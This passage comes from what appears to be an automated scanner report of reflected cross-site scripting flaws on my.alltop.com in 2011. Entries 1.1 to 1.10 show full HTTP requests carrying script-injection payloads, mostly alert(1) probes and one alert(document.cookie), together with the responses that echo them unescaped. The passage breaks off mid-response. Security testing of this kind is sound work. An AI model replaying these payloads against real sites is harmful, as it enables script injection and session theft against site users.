1.268. http://my.alltop.com/scottkelby [name of an arbitrarily supplied request parameter]

1.269. http://my.alltop.com/scripts/ ['"--> parameter]

1.270. http://my.alltop.com/scripts/ [name of an arbitrarily supplied request parameter]

1.271. http://my.alltop.com/scripts/ [nsextt parameter]

1.272. http://my.alltop.com/scripts/sifr/ ['"--> parameter]

1.273. http://my.alltop.com/scripts/sifr/ [name of an arbitrarily supplied request parameter]

1.274. http://my.alltop.com/scripts/sifr/ [nsextt parameter]



1. Cross-site scripting (reflected)
There are 274 instances of this issue:


1.1. http://my.alltop.com/ ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /

Issue detail

The value of the '"--></style></script><script>netsparker(0x0000D5)</script> request parameter is copied into the HTML document as plain text between tags. The payload a28d1<script>alert(1)</script>48e872fc857 was submitted in the '"--></style></script><script>netsparker(0x0000D5)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?'"--></style></script><script>netsparker(0x0000D5)</script>a28d1<script>alert(1)</script>48e872fc857 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:34 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:40 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:40 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>a28d1<script>alert(1)</script>48e872fc857" method="post" accept-charset="utf-8">
...[SNIP]...

1.2. http://my.alltop.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca73b"><script>alert(1)</script>779bc52546d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ca73b"><script>alert(1)</script>779bc52546d=1 HTTP/1.1
Host: my.alltop.com
Proxy-Connection: keep-alive
Referer: http://sharepoint.alltop.com/favicon.icoa6c4d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E365c9a34273
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=160012002.1299617018.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-414054026-1299617018360; myAlltopSession=i4a5ogk64978pgcjhn10qfejb6; alltop_r=159; __utma=160012002.1234645092.1299617018.1299617018.1299617018.1; __utmc=160012002; __utmb=160012002.4.9.1299617157503; __qseg=Q_D|Q_T|Q_2891|Q_2782|Q_2781|Q_2369|Q_2361|Q_2360|Q_2359|Q_2358|Q_2357|Q_2356|Q_2342|Q_1213|Q_1153|Q_1152|Q_1151|Q_1150|Q_1145|Q_1144|Q_982

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:46:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:46:17 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=i4a5ogk64978pgcjhn10qfejb6; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:46:17 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_v=61f39401b0ae6399f7652d03a5d18087; expires=Fri, 05-Mar-2021 20:46:17 GMT; path=/; domain=my.alltop.com
Set-Cookie: alltop_r=159_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:46:17 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/?ca73b"><script>alert(1)</script>779bc52546d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.3. http://my.alltop.com/ [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85463"><script>alert(1)</script>a2078c7438c was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000002)%3C/script%3E85463"><script>alert(1)</script>a2078c7438c HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:05 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:06 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:06 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000002)%3C/script%3E85463"><script>alert(1)</script>a2078c7438c" method="post" accept-charset="utf-8">
...[SNIP]...

1.4. http://my.alltop.com/adamengst [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /adamengst

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b4c3"><script>alert(1)</script>08410fd8a0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adamengst?9b4c3"><script>alert(1)</script>08410fd8a0d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:52 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_45; expires=Mon, 06-Jun-2011 20:48:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 99031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/adamengst?9b4c3"><script>alert(1)</script>08410fd8a0d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.5. http://my.alltop.com/adamengst [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /adamengst

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c40f6"><script>alert(1)</script>6701be010eb was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adamengst?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F3)%3C/script%3Ec40f6"><script>alert(1)</script>6701be010eb HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:01 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:02 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45; expires=Mon, 06-Jun-2011 20:51:02 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 99367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/adamengst?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F3)%3C/script%3Ec40f6"><script>alert(1)</script>6701be010eb" method="post" accept-charset="utf-8">
...[SNIP]...

1.6. http://my.alltop.com/alisonvandiggelen [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alisonvandiggelen

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4e36"><script>alert(1)</script>d5f6676974f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alisonvandiggelen?f4e36"><script>alert(1)</script>d5f6676974f=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:14 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_15656; expires=Mon, 06-Jun-2011 20:49:14 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 92119

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alisonvandiggelen?f4e36"><script>alert(1)</script>d5f6676974f=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.7. http://my.alltop.com/alisonvandiggelen [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alisonvandiggelen

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93c4e"><script>alert(1)</script>8ffe2b108 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alisonvandiggelen?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000219)%3C/script%3E93c4e"><script>alert(1)</script>8ffe2b108 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:17 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:18 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45_15656; expires=Mon, 06-Jun-2011 20:51:18 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 92447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alisonvandiggelen?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000219)%3C/script%3E93c4e"><script>alert(1)</script>8ffe2b108" method="post" accept-charset="utf-8">
...[SNIP]...

1.8. http://my.alltop.com/alpha/ ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/

Issue detail

The value of the '"--></style></script><script>netsparker(0x000143)</script> request parameter is copied into the HTML document as plain text between tags. The payload 47584<script>alert(1)</script>6ff2ed5c8b2 was submitted in the '"--></style></script><script>netsparker(0x000143)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/?'"--></style></script><script>netsparker(0x000143)</script>47584<script>alert(1)</script>6ff2ed5c8b2 HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:57 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:57 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>47584<script>alert(1)</script>6ff2ed5c8b2" method="post" accept-charset="utf-8">
...[SNIP]...

1.9. http://my.alltop.com/alpha/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5781"><script>alert(1)</script>6e43a20818d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/?d5781"><script>alert(1)</script>6e43a20818d=1 HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:38 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:41 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:41 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/?d5781"><script>alert(1)</script>6e43a20818d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.10. http://my.alltop.com/alpha/ [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa79a"><script>alert(1)</script>cbd44e0cb8a was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000BF)%3C/script%3Efa79a"><script>alert(1)</script>cbd44e0cb8a HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
